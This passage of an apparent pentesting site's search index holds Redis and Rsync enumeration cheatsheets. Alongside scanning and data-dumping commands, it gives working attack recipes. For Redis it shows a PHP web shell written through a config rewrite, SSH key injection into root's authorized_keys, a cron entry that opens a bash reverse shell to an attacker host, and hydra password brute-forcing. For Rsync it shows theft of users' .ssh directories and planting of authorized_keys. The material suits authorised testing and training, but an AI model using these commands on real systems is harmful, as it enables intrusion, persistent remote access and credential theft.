There is no system package — it runs directly with \u003ccode\u003epython3\u003c/code\u003e.\u003c/p\u003e","title":"ReconSpider"},{"content":"Redis Enumeration Cheatsheet Default Port: 6379 (TCP) — often unauthenticated and bound to all interfaces\nInitial Scanning nmap -p 6379 -sV \u0026lt;ip\u0026gt; nmap -p 6379 --script redis-info \u0026lt;ip\u0026gt; # Server info / config nmap -p 6379 --script redis-* \u0026lt;ip\u0026gt; # All Redis scripts Connecting # Install client sudo apt install redis-tools # Connect (no auth) redis-cli -h \u0026lt;ip\u0026gt; redis-cli -h \u0026lt;ip\u0026gt; -p 6379 # Authenticated redis-cli -h \u0026lt;ip\u0026gt; -a \u0026lt;password\u0026gt; redis-cli -h \u0026lt;ip\u0026gt; -a \u0026lt;password\u0026gt; --no-auth-warning # One-off command without interactive shell redis-cli -h \u0026lt;ip\u0026gt; INFO # Raw connection (no client installed) nc \u0026lt;ip\u0026gt; 6379 # then type: INFO (end with CRLF) Basic Enumeration # Inside redis-cli (or: redis-cli -h \u0026lt;ip\u0026gt; \u0026lt;command\u0026gt;) INFO # Full server info (version, OS, role, etc.) 
INFO server # Just server section INFO keyspace # Databases in use and key counts CONFIG GET * # Dump all config values CONFIG GET dir # Working directory (useful for writes) CONFIG GET dbfilename # RDB filename CLIENT LIST # Connected clients COMMAND COUNT # Number of available commands ACL WHOAMI # Current user (Redis 6+) ACL LIST # Access control rules (Redis 6+) Exploring Data SELECT \u0026lt;n\u0026gt; # Switch DB index (default 0) DBSIZE # Number of keys in current DB KEYS * # List ALL keys (heavy on large DBs) SCAN 0 # Cursor-based key iteration (safer) RANDOMKEY # Return a random key # Inspect a key TYPE \u0026lt;key\u0026gt; # Data type (string, list, set, hash, zset) TTL \u0026lt;key\u0026gt; # Time to live # Read by type GET \u0026lt;key\u0026gt; # string LRANGE \u0026lt;key\u0026gt; 0 -1 # list SMEMBERS \u0026lt;key\u0026gt; # set HGETALL \u0026lt;key\u0026gt; # hash ZRANGE \u0026lt;key\u0026gt; 0 -1 # sorted set # Dump everything quickly redis-cli -h \u0026lt;ip\u0026gt; --scan | while read k; do echo \u0026#34;$k =\u0026gt; $(redis-cli -h \u0026lt;ip\u0026gt; GET \u0026#34;$k\u0026#34;)\u0026#34;; done Authentication Notes # Check if auth is required redis-cli -h \u0026lt;ip\u0026gt; PING # -\u0026gt; PONG = no auth (open!) # -\u0026gt; NOAUTH ... = password required # Brute force with nmap nmap -p 6379 --script redis-brute \u0026lt;ip\u0026gt; # Brute force with hydra hydra -P /usr/share/wordlists/rockyou.txt redis://\u0026lt;ip\u0026gt; RCE / Post-Exploitation (Authorised testing only) # 1. Web shell via RDB write (if web root is writable \u0026amp; known) redis-cli -h \u0026lt;ip\u0026gt; CONFIG SET dir /var/www/html CONFIG SET dbfilename shell.php SET test \u0026#34;\u0026lt;?php system($_GET[\u0026#39;cmd\u0026#39;]); ?\u0026gt;\u0026#34; SAVE # -\u0026gt; browse to http://\u0026lt;ip\u0026gt;/shell.php?cmd=id # 2. 
SSH key injection (if redis runs as a user with ~/.ssh writable) (echo -e \u0026#34;\\n\\n\u0026#34;; cat id_rsa.pub; echo -e \u0026#34;\\n\\n\u0026#34;) \u0026gt; key.txt redis-cli -h \u0026lt;ip\u0026gt; -x SET sshkey \u0026lt; key.txt redis-cli -h \u0026lt;ip\u0026gt; CONFIG SET dir /root/.ssh CONFIG SET dbfilename authorized_keys SET sshkey \u0026#34;...\u0026#34; SAVE # -\u0026gt; ssh -i id_rsa root@\u0026lt;ip\u0026gt; # 3. Cron job injection (write to /var/spool/cron) CONFIG SET dir /var/spool/cron/crontabs CONFIG SET dbfilename root SET shell \u0026#34;\\n\\n* * * * * bash -i \u0026gt;\u0026amp; /dev/tcp/\u0026lt;lhost\u0026gt;/\u0026lt;lport\u0026gt; 0\u0026gt;\u0026amp;1\\n\\n\u0026#34; SAVE Module loading (Redis 4.x/5.x): MODULE LOAD \u0026lt;path\u0026gt; can load a malicious .so for RCE (e.g. RedisModules-ExecuteCommand / exp.so). Newer versions restrict this.\nUseful Commands Reference Command Description PING Test connectivity / auth AUTH \u0026lt;pass\u0026gt; Authenticate INFO Server stats and config CONFIG GET \u0026lt;param\u0026gt; Read a config value CONFIG SET \u0026lt;param\u0026gt; \u0026lt;val\u0026gt; Change a config value at runtime SELECT \u0026lt;n\u0026gt; Switch logical database KEYS * / SCAN 0 Enumerate keys GET / HGETALL / LRANGE / SMEMBERS Read values by type SAVE / BGSAVE Persist data to disk (RDB) MONITOR Live stream of all commands (great for sniffing) FLUSHALL Wipe all data (destructive — avoid) Notes Redis has no authentication by default and historically binds to all interfaces — exposed instances are common. CONFIG GET dir + CONFIG SET dbfilename is the key to most file-write attacks; check whether CONFIG is disabled/renamed first. MONITOR reveals live traffic including credentials passed via AUTH — useful but noisy. Redis 6+ adds ACLs and protected mode; protected-mode yes blocks external no-auth access. Only attempt write/RCE techniques against systems you\u0026rsquo;re authorised to test — they modify the target. 
","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/redis/","summary":"\u003ch1 id=\"redis-enumeration-cheatsheet\"\u003eRedis Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Port:\u003c/strong\u003e 6379 (TCP) — often unauthenticated and bound to all interfaces\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"initial-scanning\"\u003eInitial Scanning\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e6379\u003c/span\u003e -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e6379\u003c/span\u003e --script redis-info \u0026lt;ip\u0026gt;          \u003cspan style=\"color:#75715e\"\u003e# Server info / config\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e6379\u003c/span\u003e --script redis-* \u0026lt;ip\u0026gt;             \u003cspan style=\"color:#75715e\"\u003e# All Redis scripts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"connecting\"\u003eConnecting\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Install client\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install redis-tools\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Connect (no auth)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt; -p \u003cspan style=\"color:#ae81ff\"\u003e6379\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Authenticated\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt; -a \u0026lt;password\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt; -a \u0026lt;password\u0026gt; --no-auth-warning\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# One-off command without interactive shell\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt; INFO\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Raw connection (no client installed)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003enc \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e6379\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# then type: INFO  (end with CRLF)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"basic-enumeration\"\u003eBasic Enumeration\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Inside redis-cli (or: redis-cli -h \u0026lt;ip\u0026gt; \u0026lt;command\u0026gt;)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eINFO                       \u003cspan style=\"color:#75715e\"\u003e# Full server info (version, OS, role, etc.)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eINFO server                \u003cspan style=\"color:#75715e\"\u003e# Just server section\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eINFO keyspace              \u003cspan style=\"color:#75715e\"\u003e# Databases in use and key counts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG GET *               \u003cspan style=\"color:#75715e\"\u003e# Dump all config values\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG GET dir             \u003cspan style=\"color:#75715e\"\u003e# Working directory (useful for 
writes)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG GET dbfilename      \u003cspan style=\"color:#75715e\"\u003e# RDB filename\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCLIENT LIST                \u003cspan style=\"color:#75715e\"\u003e# Connected clients\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCOMMAND COUNT              \u003cspan style=\"color:#75715e\"\u003e# Number of available commands\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eACL WHOAMI                 \u003cspan style=\"color:#75715e\"\u003e# Current user (Redis 6+)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eACL LIST                   \u003cspan style=\"color:#75715e\"\u003e# Access control rules (Redis 6+)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"exploring-data\"\u003eExploring Data\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSELECT \u0026lt;n\u0026gt;                 \u003cspan style=\"color:#75715e\"\u003e# Switch DB index (default 0)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eDBSIZE                     \u003cspan style=\"color:#75715e\"\u003e# Number of keys in current DB\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eKEYS *                     \u003cspan style=\"color:#75715e\"\u003e# List ALL 
keys (heavy on large DBs)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSCAN \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e                     \u003cspan style=\"color:#75715e\"\u003e# Cursor-based key iteration (safer)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eRANDOMKEY                  \u003cspan style=\"color:#75715e\"\u003e# Return a random key\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Inspect a key\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eTYPE \u0026lt;key\u0026gt;                 \u003cspan style=\"color:#75715e\"\u003e# Data type (string, list, set, hash, zset)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eTTL \u0026lt;key\u0026gt;                  \u003cspan style=\"color:#75715e\"\u003e# Time to live\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Read by type\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGET \u0026lt;key\u0026gt;                  \u003cspan style=\"color:#75715e\"\u003e# string\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eLRANGE \u0026lt;key\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e -1          \u003cspan style=\"color:#75715e\"\u003e# list\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003eSMEMBERS \u0026lt;key\u0026gt;             \u003cspan style=\"color:#75715e\"\u003e# set\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eHGETALL \u0026lt;key\u0026gt;              \u003cspan style=\"color:#75715e\"\u003e# hash\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eZRANGE \u0026lt;key\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e -1          \u003cspan style=\"color:#75715e\"\u003e# sorted set\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Dump everything quickly\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt; --scan | \u003cspan style=\"color:#66d9ef\"\u003ewhile\u003c/span\u003e read k; \u003cspan style=\"color:#66d9ef\"\u003edo\u003c/span\u003e echo \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e$k\u003cspan style=\"color:#e6db74\"\u003e =\u0026gt; \u003c/span\u003e\u003cspan style=\"color:#66d9ef\"\u003e$(\u003c/span\u003eredis-cli -h \u0026lt;ip\u0026gt; GET \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e$k\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e\u003cspan style=\"color:#66d9ef\"\u003e)\u003c/span\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e; \u003cspan style=\"color:#66d9ef\"\u003edone\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"authentication-notes\"\u003eAuthentication Notes\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Check if auth is required\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt; PING\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# -\u0026gt; PONG          = no auth (open!)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# -\u0026gt; NOAUTH ...    = password required\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Brute force with nmap\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e6379\u003c/span\u003e --script redis-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Brute force with hydra\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -P /usr/share/wordlists/rockyou.txt redis://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"rce--post-exploitation-authorised-testing-only\"\u003eRCE / Post-Exploitation (Authorised testing only)\u003c/h2\u003e\n\u003cdiv 
class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 1. Web shell via RDB write (if web root is writable \u0026amp; known)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG SET dir /var/www/html\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG SET dbfilename shell.php\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSET test \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u0026lt;?php system(\u003c/span\u003e$_GET\u003cspan style=\"color:#e6db74\"\u003e[\u0026#39;cmd\u0026#39;]); ?\u0026gt;\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSAVE\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# -\u0026gt; browse to http://\u0026lt;ip\u0026gt;/shell.php?cmd=id\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 2. 
SSH key injection (if redis runs as root, or as a user whose ~/.ssh is writable; point dir at that user's ~/.ssh)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# the \\n\\n padding puts the key on its own line; sshd skips the surrounding RDB binary lines it cannot parse\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eecho -e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\\n\\n\u0026#34;\u003c/span\u003e; cat id_rsa.pub; echo -e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\\n\\n\u0026#34;\u003c/span\u003e\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u0026gt; key.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt; -x SET sshkey \u0026lt; key.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG SET dir /root/.ssh\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG SET dbfilename authorized_keys\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# sshkey already holds the padded key from the -x SET above; setting it again here would overwrite it\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSAVE\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# -\u0026gt; ssh -i id_rsa root@\u0026lt;ip\u0026gt;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 3. 
Cron job injection (Debian/Ubuntu path shown; RHEL-family uses /var/spool/cron/root. Debian cron usually rejects a crontab containing RDB binary junk, so expect this to work on RHEL/CentOS rather than Ubuntu)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG SET dir /var/spool/cron/crontabs\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG SET dbfilename root\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSET shell \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\\n\\n* * * * * bash -i \u0026gt;\u0026amp; /dev/tcp/\u0026lt;lhost\u0026gt;/\u0026lt;lport\u0026gt; 0\u0026gt;\u0026amp;1\\n\\n\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSAVE\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Note the original values (CONFIG GET dir, CONFIG GET dbfilename) before changing them and restore them after SAVE, otherwise Redis keeps persisting into the hijacked path\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eModule loading (Redis 4.x/5.x):\u003c/strong\u003e \u003ccode\u003eMODULE LOAD \u0026lt;path\u0026gt;\u003c/code\u003e can load a malicious \u003ccode\u003e.so\u003c/code\u003e for RCE (e.g. RedisModules-ExecuteCommand / exp.so); the \u003ccode\u003e.so\u003c/code\u003e must already exist on the target filesystem, since \u003ccode\u003eMODULE LOAD\u003c/code\u003e does not upload it. 
Newer versions restrict this.\u003c/p\u003e","title":"Redis"},{"content":"Rsync Enumeration Cheatsheet Default Port: 873 (TCP)\nDetection nmap -p 873 \u0026lt;ip\u0026gt; nmap -p 873 -sV \u0026lt;ip\u0026gt; nmap -p 873 --script rsync-list-modules \u0026lt;ip\u0026gt; nc -nv \u0026lt;ip\u0026gt; 873 List Available Modules (Shares) # List modules (no auth) rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/ rsync rsync://\u0026lt;ip\u0026gt;/ # nc banner grab nc -nv \u0026lt;ip\u0026gt; 873 # Then type: #list Enumerate Files in a Module rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/subdir/ # Recursive listing of entire module rsync -r --list-only rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ Download Files # Download single file rsync rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/file.txt ./ # Download entire module rsync -av rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ ./local_copy/ # With credentials rsync -av rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ ./ rsync --password-file=pass.txt rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ ./ # Dry run (see what would be downloaded) rsync -av --dry-run rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ ./ Upload Files # Upload single file rsync -av ./shell.php rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ # Upload directory rsync -av ./payload/ rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/uploads/ # With password file rsync --password-file=pass.txt -av ./file rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ High-Value Paths to Check rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/home/ rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/root/ rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/etc/ rsync -av --list-only 
rsync://\u0026lt;ip\u0026gt;/backup/ rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/var/www/ rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/.ssh/ SSH Key Theft \u0026amp; Planting # Download .ssh directory rsync -av rsync://\u0026lt;ip\u0026gt;/home/\u0026lt;user\u0026gt;/.ssh/ ./stolen_keys/ # Plant authorized_keys (if write access) rsync -av ~/.ssh/id_rsa.pub rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/home/\u0026lt;user\u0026gt;/.ssh/authorized_keys Nmap Scripts nmap -p 873 --script rsync-list-modules \u0026lt;ip\u0026gt; ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/rsync/","summary":"\u003ch1 id=\"rsync-enumeration-cheatsheet\"\u003eRsync Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Port:\u003c/strong\u003e 873 (TCP)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"detection\"\u003eDetection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 